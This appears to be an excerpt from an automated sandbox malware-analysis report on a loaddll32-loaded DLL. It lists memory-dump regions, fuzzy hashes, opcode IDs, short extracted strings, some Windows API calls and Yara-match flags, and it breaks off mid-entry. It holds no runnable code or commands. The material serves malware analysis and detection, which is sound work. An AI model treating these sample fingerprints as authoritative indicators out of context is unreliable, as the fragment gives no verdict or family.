                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: :O$g;{
                                                                                                                                                                                      • API String ID: 0-3257243416
                                                                                                                                                                                      • Opcode ID: 1f7edd328e28f6af2a72c4d4d6a5b36b3881e85017b5a27d0145efcadb109785
                                                                                                                                                                                      • Instruction ID: df97f2a3eaa5c11f60c291b481ab5b04538a1e9e7b0de382991c33297fdcef56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f7edd328e28f6af2a72c4d4d6a5b36b3881e85017b5a27d0145efcadb109785
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E4102B580034AEBCF05CFA5DA0A8DEBFB1FF54318F108549E921AA210C3B59724DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,6E9F0A5C,?,?,?,?,?,?,00000000), ref: 6E9F0C8E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                      • Opcode ID: 640c6ed496244a99e064e68303b666b5244ffed1ddb963031c5ce5be8e196319
                                                                                                                                                                                      • Instruction ID: 2034310c28fe435c98ff3a058311ada9e8e69b36fc85a96a96ea878f1e49303d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 640c6ed496244a99e064e68303b666b5244ffed1ddb963031c5ce5be8e196319
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DB18B31220609CFDB44CF68C4A6B547BE8FF05369F258658E8A9CF2A1D335E982CF40
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E9ECC5A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                      • Opcode ID: 4e6d9e55d6e906b90d9c113bc6fb7878ed6a654281f9effed227aa2ca64379e8
                                                                                                                                                                                      • Instruction ID: a9aa6ef8c9b47ca634084c07f3c730bbd412973dd1ce5870b6e6dc3e70afec9a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e6d9e55d6e906b90d9c113bc6fb7878ed6a654281f9effed227aa2ca64379e8
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB5138B1A007058FEB06CFA5C6827AABBF4AF89310F14C46AD655FB641D276D981CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 08d4acb28acff7e0a74d03d1c8b7ad8ecb132d86b12dc412a7788d7eafb4d6cc
                                                                                                                                                                                      • Instruction ID: ed3eeabb0bcd35f04824657bfba20de84b52e8cdc64b2e25b619ba1ae9bc3231
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08d4acb28acff7e0a74d03d1c8b7ad8ecb132d86b12dc412a7788d7eafb4d6cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 764193B5904259AFDB50DFB9CC98AEABBBCAF45304F1446D9E419D3200DB35DE868F10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UNC\
                                                                                                                                                                                      • API String ID: 0-505053535
                                                                                                                                                                                      • Opcode ID: 5edb32cfbfafeaf97351737a6ef458f817c17824452d78de5cb4e8b9cf357b65
                                                                                                                                                                                      • Instruction ID: ffd419d969fede88173f84cae9cab5983145feebeb1e260e83f166e699fcd8e8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edb32cfbfafeaf97351737a6ef458f817c17824452d78de5cb4e8b9cf357b65
                                                                                                                                                                                      • Instruction Fuzzy Hash: F7D1E6316086068FC312CFAAC4C065AB7E7AF87314F548B59D6A88B795D631DD4ECF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ^5}
                                                                                                                                                                                      • API String ID: 0-367400351
                                                                                                                                                                                      • Opcode ID: d9b3dfb9abf1797ff7b7304e16bd39d81c8cf8c7358242596657e62b49536553
                                                                                                                                                                                      • Instruction ID: a39d52e6410d71ae6aceb5185bf5d09de19f064d093917b4fb7875517a3b28be
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9b3dfb9abf1797ff7b7304e16bd39d81c8cf8c7358242596657e62b49536553
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7A178721083409BC66ADF25E49952FBBE5FBD4718F500A2EF58A96760C7718E48CF83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Rz
                                                                                                                                                                                      • API String ID: 0-2038740235
                                                                                                                                                                                      • Opcode ID: f9f917a188e91b2571cc0c04984be7d147e3daa9b879942f556ccd19b83613b2
                                                                                                                                                                                      • Instruction ID: 96fa5745d15bc1f3e84310b75d169ef60027a8c069f7d53de24a0a30dffdb30c
                                                                                                                                                                                      • Opcode Fuzzy Hash: f9f917a188e91b2571cc0c04984be7d147e3daa9b879942f556ccd19b83613b2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A913FB20093819FC759CF26E58941BFBF5FBD5708F004A1EF29696260D7B18A09CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: &-
                                                                                                                                                                                      • API String ID: 0-1647332301
                                                                                                                                                                                      • Opcode ID: 48a0cec9f684c97d2c30d5ecc04aaf7a18f079e69db43db69782dc43f84eae25
                                                                                                                                                                                      • Instruction ID: 07b2bf95943735c14b8fd72ff519233a820bac51e695ab56f53c7f1ea5508058
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48a0cec9f684c97d2c30d5ecc04aaf7a18f079e69db43db69782dc43f84eae25
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D715371408381ABC769CF64D48A55FBFE1BBD5398F504A1EF09256260D3B5CA89CB83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ]1
                                                                                                                                                                                      • API String ID: 0-3136993215
                                                                                                                                                                                      • Opcode ID: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
                                                                                                                                                                                      • Instruction ID: 685c61f26be105778fee2dbbdcf4677586813aeedb219bb16b3cc7e2aa067585
                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F51643200D341AFC369CF65D98981FBBE9FBD4758F504A0EF59296260D7B1CA498F82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ){
                                                                                                                                                                                      • API String ID: 0-1738580931
                                                                                                                                                                                      • Opcode ID: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
                                                                                                                                                                                      • Instruction ID: 61a939196a37e551b4780b81870271251d16a140a17eff669f9d1781b4acc6c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: AF4167316083059FC718DF22998682FFBE1FBD8748F00891DF58696261D7B1CA1A8F83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: B;}
                                                                                                                                                                                      • API String ID: 0-3368358345
                                                                                                                                                                                      • Opcode ID: 793dca8da7aa30b7a6c71cafc0195994e5d0f28d0fcf368c3c87f69274153511
                                                                                                                                                                                      • Instruction ID: 53d88fa2d3ecac5ff5bbd70c174fd82a40317439ca5412c6ec1646fa69c2c80e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 793dca8da7aa30b7a6c71cafc0195994e5d0f28d0fcf368c3c87f69274153511
                                                                                                                                                                                      • Instruction Fuzzy Hash: 245114721083459FC75ACF26D98682BBFE5FBC8748F544A0DF59656220C3B18A19CF87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: N
                                                                                                                                                                                      • API String ID: 0-3948818596
                                                                                                                                                                                      • Opcode ID: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
                                                                                                                                                                                      • Instruction ID: 28df6c227eae95e2f29e11061542a3612357591abbcb5309211ad79b77593e75
                                                                                                                                                                                      • Opcode Fuzzy Hash: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
                                                                                                                                                                                      • Instruction Fuzzy Hash: D441B9721083819BC759CE26E55A42FBAF1FBD4748F104A1EF5A666260C3B48A09CFC3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C|
                                                                                                                                                                                      • API String ID: 0-2444742693
                                                                                                                                                                                      • Opcode ID: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
                                                                                                                                                                                      • Instruction ID: 4c5e32ab2903d64768fc56c20e66bf769b2532548ae967e8879aa447bd920ec9
                                                                                                                                                                                      • Opcode Fuzzy Hash: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1441E271E01209EBCF09CFA6D9868DEBFB6EB84314F20C09AE015AB250D7B55B55DF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: CCP
                                                                                                                                                                                      • API String ID: 0-1034069945
                                                                                                                                                                                      • Opcode ID: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
                                                                                                                                                                                      • Instruction ID: e4eb446ca344feddf45b4b588b9af64af597e8afafb96e32685e40be88cfdf82
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3741F1B2C0131DABCF59DFE4D94A8EEBBB4FB24304F108199E511B6260E3B41A55DFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 2+]X
                                                                                                                                                                                      • API String ID: 0-635157736
                                                                                                                                                                                      • Opcode ID: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
                                                                                                                                                                                      • Instruction ID: 211402abb129bbe2c9a1caed0605418bc00b249a53d61cc01a550835e560adde
                                                                                                                                                                                      • Opcode Fuzzy Hash: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0931AA72A283519BC315CF28848195AFBE0FFA8714F450A2DE886A7341CB30E909CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: g
                                                                                                                                                                                      • API String ID: 0-1037297435
                                                                                                                                                                                      • Opcode ID: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
                                                                                                                                                                                      • Instruction ID: dc11117267985c53448811b92dd0b2ac6a5e924064f34427435e617a73ffa662
                                                                                                                                                                                      • Opcode Fuzzy Hash: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4121CC72A083108FC715CF2AD88151BB7E6EFD8718F048A2EF499D3290DFB0D9058B42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: BGd
                                                                                                                                                                                      • API String ID: 0-2042166335
                                                                                                                                                                                      • Opcode ID: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
                                                                                                                                                                                      • Instruction ID: 4c52885539e347aa7a5f26b50e8d4da414cebce2f0afe4915e331410451cb45b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C2123B6D0020DEBCF14CFA5DA4A8EEFBB5EB44304F148199D921B6260D3B44B05CF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: PGX
                                                                                                                                                                                      • API String ID: 0-1232467878
                                                                                                                                                                                      • Opcode ID: 770d73dea870fb846bd8edcc74630eeb56674650d40ec9b42452b7d261c14988
                                                                                                                                                                                      • Instruction ID: 6f84f18a74ee79fea3cd4d1de4c0f963d152d58942d677e92064274fe71c8902
                                                                                                                                                                                      • Opcode Fuzzy Hash: 770d73dea870fb846bd8edcc74630eeb56674650d40ec9b42452b7d261c14988
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1731CF71D0120EEBCB09DFA1D54A4AEFBB1BB40308F208199D122BA260D7B45B59DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c6eaf7d60585a71cbdeb7b88e3fe8a47f6d2f10eff7ebae75e4d2018208cfc3e
                                                                                                                                                                                      • Instruction ID: 77284bec571606856d319b785e4713e925e51ed4883d3d64750b7a98ee27c8e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: c6eaf7d60585a71cbdeb7b88e3fe8a47f6d2f10eff7ebae75e4d2018208cfc3e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C02F731B18B258FD305DE7DC48422AB7E6AFDA340F51CB2EE845A7354E770E8858B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5521ad43c833ea5b4d93e8653a5f3b55e6fc4dc40a983051784ca8e94abca3a8
                                                                                                                                                                                      • Instruction ID: e6d777c09bf8357c17a7530a46cd41a7d143dca4c334b59bce0721317102fb83
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5521ad43c833ea5b4d93e8653a5f3b55e6fc4dc40a983051784ca8e94abca3a8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E6134B2D00209EBCF09CFA5D98A5EEFBB2FB48314F208059E51176260D7B51A59CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5d02c3335b9b3e13b88a5ab96b354dd992bc1392479b39dbf893577d8e43ecdf
                                                                                                                                                                                      • Instruction ID: f780396acb51c7eb1d6583d26f360e8aa0f696350dd40dfcb4cccccc407ff999
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d02c3335b9b3e13b88a5ab96b354dd992bc1392479b39dbf893577d8e43ecdf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 52418EB26083418BC759CF24E99542FBBE5FBD4748F100A1EF18656261D775C958CB83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
                                                                                                                                                                                      • Instruction ID: 613f237e311adfba9d339abb9a34ebed54251c00bcd7c9c7994b3204bce588cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41F1B1C00219ABCF45DFE4C88A8EEBBB5FF48348F508548E521B6250D3B54A45DFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
                                                                                                                                                                                      • Instruction ID: 685c4c50e125d608c31356e97eb688370d42967fab512e9876a969192495ff81
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
